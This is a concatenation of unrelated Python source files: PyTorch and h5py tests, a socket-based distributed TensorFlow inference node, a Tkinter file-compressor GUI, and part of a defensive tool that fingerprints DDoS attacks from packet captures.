f"Expected {mode} to map to {mapping[mode]} but got {set_debug_mode}",
)
for mode in invalid_debug_modes:
os.environ["TORCH_DISTRIBUTED_DEBUG"] = str(mode)
with self.assertRaisesRegex(RuntimeError, "The value of TORCH_DISTRIBUTED_DEBUG must"):
dist.set_debug_level_from_env()
class DummyWork(dist._Work):
def wait(self, timeout=5.0):
if torch.cuda.is_available():
torch.cuda.current_stream().synchronize()
return True
class DummyProcessGroup(dist.ProcessGroup):
def getBackendName(self):
return "Dummy"
def allgather(self, output_tensor_lists, input_tensor_list, opts=None):
for output_tensor_list, input_tensor in zip(output_tensor_lists, input_tensor_list):
for output_tensor in output_tensor_list:
output_tensor.copy_(input_tensor)
return DummyWork()
def allreduce(self, tensor_list, opts=None):
for tensor in tensor_list:
tensor.add_(2)
return DummyWork()
def barrier(self, opts=None):
store = c10d._get_default_store()
key = "TEST:DummyProcessGroup:barrier"
if self.rank() == 0:
worker_count = 0
# By default, TCPServer lives on rank 0. So rank 0 needs to make
# sure that it does not exit too early before other ranks finish
# using the store.
# Note that, _store_based_barrier does not solve this problem, as
# all ranks need to run at least one store.add(key, 0) before
# exiting, but there is no guarantee that rank 0 is still alive at
# that point.
while worker_count < self.size() - 1:
worker_count = store.add(key, 0)
else:
store.add(key, 1)
return DummyWork()
def broadcast(self, tensor_list, opts=None):
for tensor in tensor_list:
tensor.add_(1)
return DummyWork()
def reduce_scatter(self, output_tensor_list, input_tensor_lists, opts=None):
for output_tensor, input_tensor_list in zip(output_tensor_list, input_tensor_lists):
output_tensor.copy_(input_tensor_list[self.rank()])
return DummyWork()
def send(self, tensor_list, dst, tag=0):
for tensor in tensor_list:
tensor.add_(1)
return DummyWork()
def recv(self, tensor_list, src, tag=0):
for tensor in tensor_list:
tensor.add_(2)
return DummyWork()
class PythonProcessGroupExtensionTest(MultiProcessTestCase):
def setUp(self):
super(PythonProcessGroupExtensionTest, self).setUp()
self._spawn_processes()
def tearDown(self):
super(PythonProcessGroupExtensionTest, self).tearDown()
try:
os.remove(self.file_name)
except OSError:
pass
def test_get_backend_name(self):
dpg = DummyProcessGroup(0, 1)
self.assertEqual("Dummy", dpg.name())
def test_backend_class_attr(self):
dist.Backend.register_backend(
"dummy",
PythonProcessGroupExtensionTest.create_dummy
)
self.assertEqual(dist.Backend.DUMMY, "DUMMY")
self.assertEqual(
dist.Backend._plugins["DUMMY"],
PythonProcessGroupExtensionTest.create_dummy
)
@staticmethod
def create_dummy(store, rank, size, timeout):
return DummyProcessGroup(rank, size)
def test_collectives(self):
dist.Backend.register_backend("dummy", PythonProcessGroupExtensionTest.create_dummy)
os.environ['MASTER_ADDR'] = 'localhost'
os.environ['MASTER_PORT'] = '6789'
dist.init_process_group("dummy", rank=self.rank, world_size=self.world_size)
# test all_gather
input_tensor = torch.ones(2, 2) * 7
output_tensor_list = [torch.zeros(2, 2) for _ in range(self.world_size)]
dist.all_gather(output_tensor_list, input_tensor)
for tensor in output_tensor_list:
self.assertEqual(tensor, input_tensor)
# test all_reduce
input_tensor = torch.ones(2, 2) * 7
dist.all_reduce(input_tensor)
self.assertEqual(input_tensor, torch.ones(2, 2) * 7 + 2)
# test broadcast
input_tensor = torch.zeros(2, 2)
dist.broadcast(input_tensor, 0, async_op=True).wait()
self.assertEqual(torch.ones(2, 2), input_tensor)
# test reduce_scatter
output_tensor = torch.zeros(2, 2)
input_tensor_list = [torch.ones(2, 2) for _ in range(self.world_size)]
dist.reduce_scatter(output_tensor, input_tensor_list)
self.assertEqual(output_tensor, torch.zeros(2, 2) + 1)
dist.barrier()
dist.destroy_process_group()
def test_send_recv(self):
dist.Backend.register_backend("dummy", PythonProcessGroupExtensionTest.create_dummy)
os.environ['MASTER_ADDR'] = 'localhost'
os.environ['MASTER_PORT'] = '6789'
dist.init_process_group("dummy", rank=self.rank, world_size=self.world_size)
# test send
input_tensor = torch.zeros(2, 2)
dist.send(input_tensor, (self.rank + 1) % self.world_size)
self.assertEqual(input_tensor, torch.zeros(2, 2) + 1)
# test recv
input_tensor = torch.zeros(2, 2)
dist.recv(input_tensor, (self.rank + 1) % self.world_size)
self.assertEqual(input_tensor, torch.zeros(2, 2) + 2)
dist.barrier()
# intentionally not calling into `destroy_process_group` as not all
# user applications would explicitly that.
instantiate_parametrized_tests(CommonDistributedDataParallelTest)
if __name__ == "__main__":
assert (
not torch.cuda._initialized
), "test_distributed must not have initialized CUDA context on main process"
run_tests()
|
node.py
|
import orjson as json
import queue
import socket
from threading import Thread
from queue import Queue
import select
import time
import numpy as np
import tensorflow as tf
from node_state import NodeState, socket_recv, socket_send
import zfpy
import lz4.frame
# port 5000 is data, 5001 is model architecture, 5002 is weights
class Node:
def _model_socket(self, node_state: NodeState):
model_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
model_server.bind(("0.0.0.0", 5001))
print("Model socket running")
model_server.listen(1)
model_cli = model_server.accept()[0]
model_cli.setblocking(0)
model_json = socket_recv(model_cli, node_state.chunk_size)
next_node = socket_recv(model_cli, chunk_size=1)
part = tf.keras.models.model_from_json(model_json)
while (node_state.weights == ""): # Waiting for weights to be sent on other thread
time.sleep(5)
part.set_weights(node_state.weights)
id = socket.gethostbyname(socket.gethostname())
md = part
md._make_predict_function()
node_state.model = md
tf.keras.utils.plot_model(md, f"model_{id}.png")
node_state.next_node = next_node.decode()
select.select([], [model_cli], [])
model_cli.send(b'\x06')
model_server.close()
def _weights_socket(self, node_state):
chunk_size = node_state.chunk_size
weights_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
weights_server.bind(("0.0.0.0", 5002))
weights_server.listen(1)
weights_cli = weights_server.accept()[0]
weights_cli.setblocking(0)
model_weights = self._recv_weights(weights_cli, chunk_size)
node_state.weights = model_weights
weights_server.close()
def _recv_weights(self, sock: socket.socket, chunk_size: int):
size_left = 8
byts = bytearray()
while size_left > 0:
try:
recv = sock.recv(min(size_left, 8))
size_left -= len(recv)
byts.extend(recv)
except socket.error as e:
if e.errno != socket.EAGAIN:
raise e
select.select([sock], [], [])
array_len = int.from_bytes(byts, 'big')
weights = []
for i in range(array_len):
recv = bytes(socket_recv(sock, chunk_size))
weights.append(self._decomp(recv))
return weights
def _comp(self, arr):
return lz4.frame.compress(zfpy.compress_numpy(arr))
def _decomp(self, byts):
return zfpy.decompress_numpy(lz4.frame.decompress(byts))
def _data_server(self, node_state: NodeState, to_send: Queue):
chunk_size = node_state.chunk_size
data_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
data_server.bind(("0.0.0.0", 5000))
data_server.listen(1)
data_cli = data_server.accept()[0]
data_cli.setblocking(0)
while True:
data = bytes(socket_recv(data_cli, chunk_size))
inpt = zfpy.decompress_numpy(data)
to_send.put(inpt)
def _data_client(self, node_state: NodeState, to_send: Queue):
graph = tf.get_default_graph()
while node_state.next_node == "":
time.sleep(5)# Wait until next_node is set by model socket
chunk_size = node_state.chunk_size
model = node_state.model
next_node_client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
next_node_client.connect((node_state.next_node, 5000))
next_node_client.setblocking(0)
while True:
inpt = to_send.get()
with graph.as_default():
output = model.predict(inpt)
out = self._comp(output)
socket_send(out, next_node_client, chunk_size)
def run(self):
ns = NodeState(chunk_size = 512 * 1000)
m = Thread(target=self._model_socket, args=(ns,))
w = Thread(target=self._weights_socket, args=(ns,))
to_send = queue.Queue(1000) # Arbitrary size of queue, can change later
dserv = Thread(target=self._data_server, args=(ns, to_send))
dcli = Thread(target=self._data_client, args=(ns, to_send))
m.start()
w.start()
dserv.start()
dcli.start()
m.join()
w.join()
dserv.join()
dcli.join()
node = Node()
node.run()
|
interface.py
|
# coding: utf-8
# Módulo da interface
# Esse módulo tem como objetivo construir a interface gráfica do programa
# Autor: Marcos Castro
from Tkinter import * # funções Tkinter
from tkFileDialog import askopenfilename # função para escolher arquivo
from compactador import * # módulo compactador
import tkMessageBox # message box
from threading import Thread # importa módulo thread
class Aplicacao:
def __init__(self, master):
# cria um frame, será contêiner para armazenar os widgets
self.frame = Frame(master) # master é instância Tk
# pack é um gerenciador de geometria
# gereciandor de geometria dá uma localização para o widget
# se não colocar, ele vai existir, mas não ficará visível ao usuário
self.frame.pack()
# cria o botão adicionar
# passa o parent, título, função associada ao evento e a borda
self.botao_adicionar = Button(self.frame, text="Adicionar", command=self.adicionar, bd=3)
self.botao_adicionar['font'] = ('Arial', 12) # adiciona uma fonte
self.botao_adicionar.pack(pady=10, padx=30, side="left")
# cria botão deletar, semelhante ao botão adicionar
self.botao_deletar = Button(self.frame, text="Deletar", command=self.deletar, bd=3)
self.botao_deletar['font'] = ('Arial', 12)
self.botao_deletar.pack(padx=30, side="right")
# cria outro frame
self.frame2 = Frame(master)
self.frame2.pack()
# cria scrollbar (barra de rolagem) vertical
self.sby = Scrollbar(self.frame2)
self.sby.pack(side=RIGHT, fill=Y)
# cria scrollbar (barra de rolagem) horizontal
self.sbx = Scrollbar(self.frame2, orient=HORIZONTAL)
self.sbx.pack(side=BOTTOM, fill=X)
# cria uma listbox
self.listbox = Listbox(self.frame2, width=50, height=10, selectmode=EXTENDED)
# selectmode=EXTENDED permite seleção de mais de um item
self.listbox.pack()
# anexa listbox para scrollbar vertical e horizontal
self.listbox.config(yscrollcommand=self.sby.set)
self.sby.config(command=self.listbox.yview)
self.listbox.config(xscrollcommand=self.sbx.set)
self.sbx.config(command=self.listbox.xview)
# cria outro frame
self.frame3 = Frame(master)
self.frame3.pack()
# cria o botão compactar
self.botao_compactar = Button(self.frame3, text="Compactar", command=self.compactar, bd=3)
self.botao_compactar['font'] = ('Arial', 12)
self.botao_compactar.pack(pady=10)
# função associada ao evento do botão adicionar
def adicionar(self):
# abre janela para escolher arquivo
nome_arquivo = askopenfilename()
if nome_arquivo != "": # se escolheu algo
self.listbox.insert(END, nome_arquivo)
# função associada ao evento do botão deletar
# essa função deleta os itens selecionados
def deletar(self):
items = self.listbox.curselection() # obtem lista de índices dos itens
if len(items) == 0:
tkMessageBox.showinfo("Compactador", "Selecione pelo menos um item!")
else:
pos = 0
for i in items: # percorre a lista de indices
item_pos = int(i) - pos # obtem a posição do item selecionado
self.listbox.delete(item_pos, item_pos) # deleta um item selecionado
pos = pos + 1 # incrementa pos
# função associada ao evento do botão compactar
def compactar(self):
# pega todos os itens da listbox
lista_arquivos = self.listbox.get(0, END)
if len(lista_arquivos) == 0:
tkMessageBox.showinfo("Compactador", "Adicione algum arquivo para compactar!")
return # sai da função
def executar():
self.botao_compactar.configure(state=DISABLED) # desabilita o botão
# se a lista não estiver vazia, compacta
compactador = Compactador() # obtém instância de Compactador
compactador.compactar(lista_arquivos) # compacta todos os arquivos
self.botao_compactar.configure(state=NORMAL) # habilita o botão
t = Thread(target=executar) # cria thread
t.start() # inicia a thread
root = Tk() # obtém uma instância de Tk
root.title("Compactador de arquivos") # coloca um titulo na janela
root.iconbitmap(default="icone.ico") # coloca um icone
root.geometry('400x300') # ajusta o tamanho
root.resizable(width=FALSE, height=FALSE) # desabilita o redimensionamento da janela
Aplicacao(root) # passa instancia de Tk para classe Aplicacao
root.mainloop() # event loop da aplicação
|
test_threads.py
|
# This file is part of h5py, a Python interface to the HDF5 library.
#
# http://www.h5py.org
#
# Copyright 2008-2013 Andrew Collette and contributors
#
# License: Standard 3-clause BSD; see "license.txt" for full license terms
# and contributor agreement.
"""
Tests the h5py.File object.
"""
from __future__ import absolute_import
import threading
import h5py
from ..common import ut, TestCase
class TestErrorPrinting(TestCase):
"""
Verify the error printing is squashed in all threads.
"""
def test_printing(self):
""" No console messages should be shown from containership tests """
# Unfortunately we can't have this test assert anything, as
# HDF5 writes directly to stderr. But it will show up in the
# console output.
import threading
def test():
with h5py.File(self.mktemp(), 'w') as newfile:
try:
doesnt_exist = newfile['doesnt_exist'].value
except KeyError:
pass
th = threading.Thread(target=test)
th.start()
th.join()
def test_attr_printing(self):
""" No console messages should be shown for non-existing attributes """
def test():
with h5py.File(self.mktemp(), 'w') as newfile:
newfile['newdata'] = [1,2,3]
try:
nonexistent_attr = newfile['newdata'].attrs['nonexistent_attr']
except KeyError:
pass
th = threading.Thread(target=test)
th.start()
th.join()
|
ddos_dissector.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
###############################################################################
# Concordia Project
#
# This project has received funding from the European Union’s Horizon
# 2020 Research and Innovation program under Grant Agreement No 830927.
#
# Joao Ceron - joaoceron@sidn.nl
###############################################################################
###############################################################################
### Python modules
import time
import threading
import sys
import subprocess
import socket
import signal
import shutil
import requests
import re
import copy
import queue as queue
import pandas as pd
import os
import numpy as np
import logging
import json
import hashlib
import cursor
import configparser
import ipaddr
import argparse
from subprocess import check_output, STDOUT
from pygments.lexers import JsonLexer
from pygments.formatters import TerminalFormatter
from pygments import highlight
from io import StringIO
from datetime import datetime
from argparse import RawTextHelpFormatter
from hashlib import sha256
###############################################################################
### Program settings
verbose = False
program_name = os.path.basename(__file__)
version = "3.1"
# GLOBAL parameters
# percentage used to determine correlation between to lists
SIMILARITY_THRESHOLD = 80
NONE = -1
FLOW_TYPE = 0
PCAP_TYPE = 1
###############################################################################
### Subrotines
#------------------------------------------------------------------------------
def parser_add_arguments():
"""
Parse comamnd line parameters
"""
parser = argparse.ArgumentParser(prog=program_name, usage='%(prog)s [options]', epilog="Example: ./%(prog)s -f ./pcap_samples/sample1.pcap --summary --upload ", formatter_class=RawTextHelpFormatter)
parser.add_argument("--version", help="print version and exit", action="store_true")
parser.add_argument("-v","--verbose", help="print info msg", action="store_true")
parser.add_argument("-d","--debug", help="print debug info", action="store_true")
parser.add_argument("-q","--quiet", help="ignore animation", action="store_true")
parser.add_argument("--status", dest='status', help="check available repositories", action="store_true")
parser.add_argument("-s","--summary", help="present fingerprint evaluation summary", action="store_true")
parser.add_argument("-u","--upload", help="upload to the selected repository", action="store_true")
parser.add_argument("--log", default='log.txt', nargs='?',help="Log filename. Default =./log.txt\"")
parser.add_argument("--fingerprint_dir", default='fingerprints', nargs='?',help="Fingerprint storage directory. Default =./fingerprints\"")
parser.add_argument("--config", default='ddosdb.conf', nargs='?',help="Configuration File. Default =./ddosdb.conf\"")
parser.add_argument("--host", nargs='?',help="Upload host. ")
parser.add_argument("--user", nargs='?',help="repository user. ")
parser.add_argument("--passwd", nargs='?',help="repository password.")
parser.add_argument("-g","--graph", help="build dot file (graphviz). It can be used to plot a visual representation\n of the attack using the tool graphviz. When this option is set, youn will\n received information how to convert the generate file (.dot) to image (.png).", action="store_true")
parser.add_argument('-f','--filename', nargs='?', required=False, help="")
return parser
#------------------------------------------------------------------------------
def signal_handler(signum, handler):
"""
Signal handler
"""
sys.stdout.flush()
print('\nCtrl+C detected.')
cursor.show()
sys.exit(0)
#------------------------------------------------------------------------------
class CustomConsoleFormatter(logging.Formatter):
"""
Log facility format
"""
def format(self, record):
formater = "%(levelname)s - %(message)s"
if record.levelno == logging.INFO:
GREEN = '\033[32m'
reset = "\x1b[0m"
log_fmt = GREEN + formater + reset
self._style._fmt = log_fmt
return super().format(record)
if record.levelno == logging.DEBUG:
CYAN = '\033[36m'
reset = "\x1b[0m"
log_fmt = CYAN + formater + reset
self._style._fmt = log_fmt
return super().format(record)
if record.levelno == logging.ERROR:
MAGENTA = '\033[35m'
reset = "\x1b[0m"
log_fmt = MAGENTA + formater + reset
self._style._fmt = log_fmt
return super().format(record)
if record.levelno == logging.WARNING:
YELLOW = '\033[33m'
reset = "\x1b[0m"
log_fmt = YELLOW + formater + reset
self._style._fmt = log_fmt
else:
self._style._fmt = formater
return super().format(record)
#------------------------------------------------------------------------------
def logger(args):
"""
Instanciate logging facility. By default, info logs are also
stored in the logfile.
param: cmd line args
"""
logger = logging.getLogger(__name__)
# root logging
if (args.debug):
logger.setLevel(logging.DEBUG)
elif (args.verbose):
logger.setLevel(logging.INFO)
# Create handlers
console_handler = logging.StreamHandler()
file_handler = logging.FileHandler(args.log)
#console_handler.setLevel(logging.DEBUG)
file_handler.setLevel(logging.INFO)
# add custom formater
my_formatter = CustomConsoleFormatter()
console_handler.setFormatter(my_formatter)
f_format = logging.Formatter("%(asctime)s - %(levelname)s - %(message)s (%(filename)s:%(lineno)d)")
file_handler.setFormatter(f_format)
# add handlers to the logger
logger.addHandler(console_handler)
logger.addHandler(file_handler)
return logger
#------------------------------------------------------------------------------
def upload(fingerprint, json_file, user, passw, host, key):
"""
Upload a fingerprint and attack vector to DDoSDB
:param fingerprint: Path to the fingerprint file
:param json_file: fingerprint generated file
:param username: DDoSDB username
:param password: DDoSDB password
:return: status_code describing HTTP code received
"""
if not os.path.isfile(json_file):
logger.critical("Could not read the fingerprint json file {}".format(json_file))
files = {
"json": open(json_file, "rb"),
# ignoring pcap file upload for now
"pcap": open(json_file, "rb"),
}
# build headers for repo fingerprint submission
headers = {
"X-Username": user,
"X-Password": passw,
"X-Filename": key
}
try:
r = requests.post(host+"upload-file", files=files, headers=headers,verify=True)
except requests.exceptions.RequestException as e:
logger.critical("Cannot connect to the server to upload fingerprint")
logger.debug("Cannot connect to the server to upload fingerprint: {}".format(e))
print (e)
return None
if (r.status_code==403):
print ("Invalid credentials or no permission to upload fingerprints:")
elif (r.status_code==201):
print ("Upload success: \n\tHTTP CODE [{}] \n\tFingerprint ID [{}]".format(r.status_code,key))
print ("\tURL: {}query?q={}".format(host,key))
else:
print ("Internal Server Error. Check repository Django logs.")
print ("Error Code: {}".format(r.status_code))
return r.status_code
#------------------------------------------------------------------------------
def get_repository(args,config):
"""
Check credentials and repository based on configuration file or cmd line args
:param args: cmd args
:param config: configuration file
return: user,pass,host: credentials for the repository
"""
user,passw,host = (None,)*3
# look for the repository to upload
if not (args.host):
logger.info("Upload host not defined. Pick the first one in the configuration file.")
config_host = config.sections()[0]
if not (config_host):
logger.critical("Could not find repository configuration. Check configuration file [dddosdb.conf].")
else:
logger.info("Assumming configuration section [{}].".format(config_host))
user = config[config_host]['user']
passw = config[config_host]['passwd']
host = config[config_host]['host']
elif args.host:
host = args.host
if (args.user and args.passwd):
user = args.user
passw = args.passwd
# user/pass not defined by cmd line
else:
# try to find in the configuration file
if args.host in config.sections():
logger.info("Host found in the configuration file")
user = config[args.host]['user']
passw = config[args.host]['passwd']
else:
logger.critical("Credentials not found for [{}].".format(args.host))
else:
logger.critical("Cannot find repository {} credentials. You should define in the cmd line or configuration file [dddosdb.conf].".format(args.host))
return None
return (user,passw,host)
#------------------------------------------------------------------------------
def prepare_tshark_cmd(input_path):
"""
Prepare the tshark command that converts a PCAP to a CSV.
:param input_path: filename
return: tshark command line to be used to convert the file
"""
tshark = shutil.which("tshark")
if not tshark:
logger.error("Tshark software not found. It should be on the path.\n")
return
cmd = [tshark, '-r', input_path, '-T', 'fields']
# fields included in the csv
fields = [
'dns.qry.type', 'ip.dst','ip.flags.mf', 'tcp.flags', 'ip.proto',
'ip.src', '_ws.col.Destination', '_ws.col.Protocol', '_ws.col.Source',
'dns.qry.name', 'eth.type', 'frame.len', '_ws.col.Info', 'udp.length',
'http.request', 'http.response', 'http.user_agent', 'icmp.type',
'ip.frag_offset', 'ip.ttl', 'ntp.priv.reqcode', 'tcp.dstport',
'tcp.srcport', 'udp.dstport', 'udp.srcport', 'frame.time_epoch',
]
for f in fields:
cmd.append('-e')
cmd.append(f)
# field options
options = ['header=y', 'separator=,', 'quote=d', 'occurrence=f' ]
for o in options:
cmd.append('-E')
cmd.append(o)
return cmd
#------------------------------------------------------------------------------
def flow_to_df(ret,filename):
"""
Convert flow file (nfdump) to DataFrame structure.
:param ret: buffer used to return the dataframe itself
:param filename: flow file
return ret: dataframe
"""
nfdump = shutil.which("nfdump")
if not nfdump:
logger.error("NFDUMP software not found. It should be on the path.")
ret.put(NONE)
cmd = [nfdump, '-r', args.filename, '-o', 'extended', '-o', 'json' ]
try:
cmd_stdout = check_output(cmd, stderr=subprocess.DEVNULL)
except:
ret.put(NONE)
sys.exit()
if not cmd_stdout:
ret.put(NONE)
sys.exit()
data = str(cmd_stdout, 'utf-8')
data = StringIO(data)
df = pd.read_json(data).fillna(NONE)
df = df[['t_first', 't_last', 'proto', 'src4_addr', 'dst4_addr',
'src_port', 'dst_port', 'fwd_status', 'tcp_flags',
'src_tos', 'in_packets', 'in_bytes', 'icmp_type',
'icmp_code',
]]
df = df.rename(columns={'dst4_addr': 'ip_dst',
'src4_addr': 'ip_src',
'src_port': 'srcport',
'dst_port': 'dstport',
't_start' : 'frame_time_epoch',
})
df.dstport = df.dstport.astype(float).astype(int)
df.srcport = df.srcport.astype(float).astype(int)
# convert protocol number to name
protocol_names = {num:name[8:] for name,num in vars(socket).items() if name.startswith("IPPROTO")}
df['proto'] = df['proto'].apply(lambda x: protocol_names[x])
# convert protocol/port to service
def convert_protocol_service(row):
try:
highest_protocol = socket.getservbyport(row['dstport'], row['proto'].lower()).upper()
return highest_protocol
except:
return "UNKNOWN"
df['highest_protocol'] = df[['dstport','proto']].apply(convert_protocol_service,axis=1)
# convert to unix epoch (sec)
df['frame_time_epoch'] = pd.to_datetime(df['t_first']).astype(int) / 10**9
df = df.drop(['t_last','t_first','fwd_status'],axis=1)
ret.put(df)
#------------------------------------------------------------------------------
def pcap_to_df(ret,filename):
"""
Convert pcap file to DataFrame structure.
:param ret: buffer used to return the dataframe itself
:param filename: flow file
return ret: dataframe
"""
cmd = prepare_tshark_cmd(filename)
if not cmd:
ret.put(NONE)
sys.exit()
try:
cmd_stdout = check_output(cmd, stderr=subprocess.DEVNULL)
except:
ret.put(NONE)
sys.exit()
if not cmd_stdout:
ret.put(NONE)
sys.exit()
data = str(cmd_stdout, 'utf-8')
data = StringIO(data)
df = pd.read_csv(data,low_memory=False,error_bad_lines=False)
# src/dst port
if (set(['tcp.srcport','udp.srcport','tcp.dstport','udp.dstport']).issubset(df.columns)):
# Combine source and destination ports from tcp and udp
df['srcport'] = df['tcp.srcport'].fillna(df['udp.srcport'])
df['dstport'] = df['tcp.dstport'].fillna(df['udp.dstport'])
df['dstport'] = df['dstport'].fillna(NONE).astype(float).astype(int)
df['srcport'] = df['srcport'].fillna(NONE).astype(float).astype(int)
if (set(['ip.src','ip.dst','_ws.col.Source','_ws.col.Destination']).issubset(df.columns)):
# Combine source and destination IP - works for IPv6
df['ip.src'] = df['ip.src'].fillna(df['_ws.col.Source'])
df['ip.dst'] = df['ip.dst'].fillna(df['_ws.col.Destination'])
# rename protocol field
df = df.rename({'_ws.col.Protocol': 'highest_protocol'},axis=1)
# protocol number to name
protocol_names = {num:name[8:] for name,num in vars(socket).items() if name.startswith("IPPROTO")}
df['ip.proto'] = df['ip.proto'].fillna(NONE).astype(float).astype(int)
df['ip.proto'] = df['ip.proto'].apply(lambda x: protocol_names[x] if (x>0) else -1)
df['ip.ttl'] = df['ip.ttl'].fillna(NONE).astype(float).astype(int)
df['udp.length'] = df['udp.length'].fillna(NONE).astype(float).astype(int)
df['ntp.priv.reqcode'] = df['ntp.priv.reqcode'].fillna(NONE).astype(float).astype(int)
# timestamp
df['start_timestamp'] = df['frame.time_epoch'].iloc[0]
# Remove columns: 'tcp.srcport', 'udp.srcport','tcp.dstport', 'udp.dstport', _ws.col.Source, _ws.col.Destination
df.drop(['tcp.srcport', 'udp.srcport', 'tcp.dstport', 'udp.dstport','_ws.col.Source', '_ws.col.Destination'], axis=1, inplace=True)
# Drop all empty columns (for making the analysis more efficient! less memory.)
df.dropna(axis=1, how='all', inplace=True)
df = df.fillna(NONE)
if 'icmp.type' in df.columns:
df['icmp.type'] = df['icmp.type'].astype(int)
if 'dns.qry.type' in df.columns:
df['dns.qry.type'] = df['dns.qry.type'].astype(int)
if 'ip.frag_offset' in df.columns:
df['ip.frag_offset'] = df['ip.frag_offset'].astype(str)
if 'ip.flags.mf' in df.columns:
df['ip.flags.mf'] = df['ip.flags.mf'].astype(str)
if ('ip.flags.mf' in df.columns) and ('ip.frag_offset' in df.columns):
# Analyse fragmented packets
df['fragmentation'] = (df['ip.flags.mf'] == '1') | (df['ip.frag_offset'] != '0')
df.drop(['ip.flags.mf', 'ip.frag_offset'], axis=1, inplace=True)
# translate flags to string
# if 'tcp.flags.str' in df.columns:
# df['tcp.flags.str'] = df['tcp.flags.str'].str.encode("utf-8")
df.columns = [c.replace('.', '_') for c in df.columns]
# remove info field
del df['_ws_col_Info']
ret.put(df)
#------------------------------------------------------------------------------
## Function for calculating the TOP 'N' and aggregate the 'others'
## Create a dataframe with the top N values and create an 'others' category
def top_n_dataframe(dataframe_field,df,n_type,top_n=20):
"""
Find top n values in one dataframe
:param dataframe_field: field to be evaluated
:param df: full dataframe
:param n_type: network file type (pcap or flow)
:param top_n: build dataframe with the top_n results
return df: dataframe itself
"""
field_name = dataframe_field.name
if (field_name == "frame_time_epoch" or field_name=="start_timestamp"):
return pd.DataFrame()
# flow - different heuristic
if (n_type==FLOW_TYPE):
if (field_name == "in_packets"):
return pd.DataFrame()
data = df.groupby(field_name)["in_packets"].sum().sort_values(ascending=False)
top = data[:top_n].reset_index()
top.columns = [field_name,'count']
new_row = pd.DataFrame(data = {
'count' : [ data[top_n:].reset_index().iloc[:,1].sum()],
field_name : ['others'],
})
# pcap
else:
top = df[field_name].value_counts().reset_index()[:top_n]
new_row = pd.DataFrame(data = {
'count' : [df[field_name].value_counts().reset_index()[top_n:][field_name].sum()],
field_name : ['others'],
})
# combine the result dataframe (top_n + aggregated 'others')
top.columns = [field_name, 'count']
top_result = pd.concat([top, new_row],sort=False)
# percentage field
df = top_result.groupby(field_name).sum()
df=df.sort_values(by="count", ascending=False)
df['percent'] = df.transform(lambda x: (x/np.sum(x)*100).round()).astype(int)
if (len(df)< 16):
# z-score useless when few elements
df['zscore'] = NONE
else:
# z-score of 2 indicates that an observation is two standard deviations above the average
# a z-score of zero represents a value that equals the mean.
df['zscore'] = ((df['count'] - df['count'].mean())/df['count'].std(ddof=0)).round().fillna(NONE)
return (df.reset_index())
#------------------------------------------------------------------------------
def infer_target_ip (df,n_type):
"""
df: dataframe from pcap
n_type: network file type (flows,pcap)
return: list of target IPs
"""
# check if the second most common value is grouped in 'others'
#
# ip_dst count percent zscore
# 94.198.154.130 2799 50 4.0
# others 1842 33 2.0 <-- not an outlier
# 94.198.154.24 86 2 -0.0
data = top_n_dataframe(df.ip_dst,df,n_type)
data = data[(data.iloc[1,0] == "others") & (data['zscore'] <3)].size
if not data:
logger.info("There are several destination IP in the dataset. High entropy. Effectiveness will be low.")
# find outlier
outlier = find_outlier(df['ip_dst'],df,n_type)
if (not outlier or len(outlier)<1):
logger.debug("We cannot find the DDoS target IP address. Not enought info to find the outlier.")
logger.debug("Trying to aggregate top IPs")
data = top_n_dataframe(df['ip_dst'],df,n_type)
# Outlier was not found (attack targeting multiples IP address)
# Try to cluster the victim IPs. Usually, there are (IPs) part of the same network block.
# Select IPs responsible for more than 20% of the traffic and try to cluster them.
# If we succeed IPs are in the same range (network mask bigger than 21) we combine than and set as target.
data_ = data[(data['percent']> 20)]['ip_dst'].tolist()
ip_lst = sorted(data[(data['percent']> 20)]['ip_dst'].tolist())
# filter ipv4|ipv6 only
ips = []
for ip in ip_lst:
try:
ipaddr.IPAddress(ip)
except:
continue
ips.append(ip)
# only one IP address has return
if (len(ips)<2):
return (ips,df)
lowest_ip = ips[0]
highest_ip = ips[-1]
# aggregation mask size
mask_length = ipaddr._get_prefix_length(int(lowest_ip), int(highest_ip), lowest_ip.max_prefixlen)
if (mask_length > 21):
logger.debug("Top IPs are correlated")
# rewrite to one IP address
for ip in ip_lst[:1]:
df.loc[df['ip_dst'] == ip,"ip_dst"] = ip_lst[0]
return ( (ip_lst[0]).split(), df)
else:
# return the top 1
return (list(df['ip_dst'].value_counts().keys()[0]),df)
else:
return (outlier,df)
#------------------------------------------------------------------------------
def animated_loading(msg="loading "):
"""
print loading animation
:param msg: prefix label
"""
chars = "▁▂▃▄▅▆▇▇▇▆▅▄▃▁"
cursor.hide()
for char in chars:
#sys.stdout.write('\r'+msg+''+char)
sys.stdout.write('\r'+'['+char+'] '+msg)
time.sleep(.1)
sys.stdout.flush()
cursor.show()
#------------------------------------------------------------------------------
def find_outlier(df_filtered,df,n_type,strict=0):
"""
Find outlier based in zscore
:param df_filtered: dataframe filtered by target_ip
:param df: full dataframe used for flows analysis
:param n_type: network file type (flows,pcap)
:param strict: turn the outlier process less flexible (ignore zscore, use frequency)
"""
field_name = df_filtered.name
# summarization dataframe
data = top_n_dataframe(df_filtered,df,n_type)
if (data.empty):
return
outlier_field = data.columns[0]
# be more strict in the filter
if (strict):
data_ = data[(data['percent']> SIMILARITY_THRESHOLD) & (data['zscore']>2)]
# if the filter does not return anything, check if the df is
# composed by only one field
if (data_.size==0):
# get first line from the summarized dataframe
data = data.head(1)
# ignore zscore, use frequency threshold
data = data[(data['percent']> SIMILARITY_THRESHOLD) & (data['zscore']<0) & (data[outlier_field]!="others")]
if (data.empty): return
outliers = data.iloc[:,0].tolist()
logger.debug("Outliers for .:{}:. --> {} \n {}" .format(outlier_field, outliers, data.head(5).to_string(index=False) ))
logger.debug('-' * 60)
return (outliers)
else:
# return the filtered dataframe saved in aux var
data = data_
# regular process - no strict
else:
data = data[(data['percent']> SIMILARITY_THRESHOLD) | (data['zscore']>2)]
if (len(data)==0): return None
outliers = data.iloc[:,0].tolist()
if (outliers == NONE):
logger.debug("Outliers for .:{}:. --> None \n {}" .format(data.columns[0], data.head(5).to_string(index=False) ))
return
# remove outlier when dispersion is equal to `others` values, for example:
# srcport count percent zscore
# 443 2157 39 3.0
# others 2135 38 3.0
zscore_others = data.loc[data[outlier_field] == "others", 'zscore'].tolist()
if (zscore_others):
# remove all fields with the same values than `others`
outliers = data[data.zscore!=zscore_others[0]].iloc[:,0].tolist()
logger.debug('-' * 60)
if (len(outliers)>0):
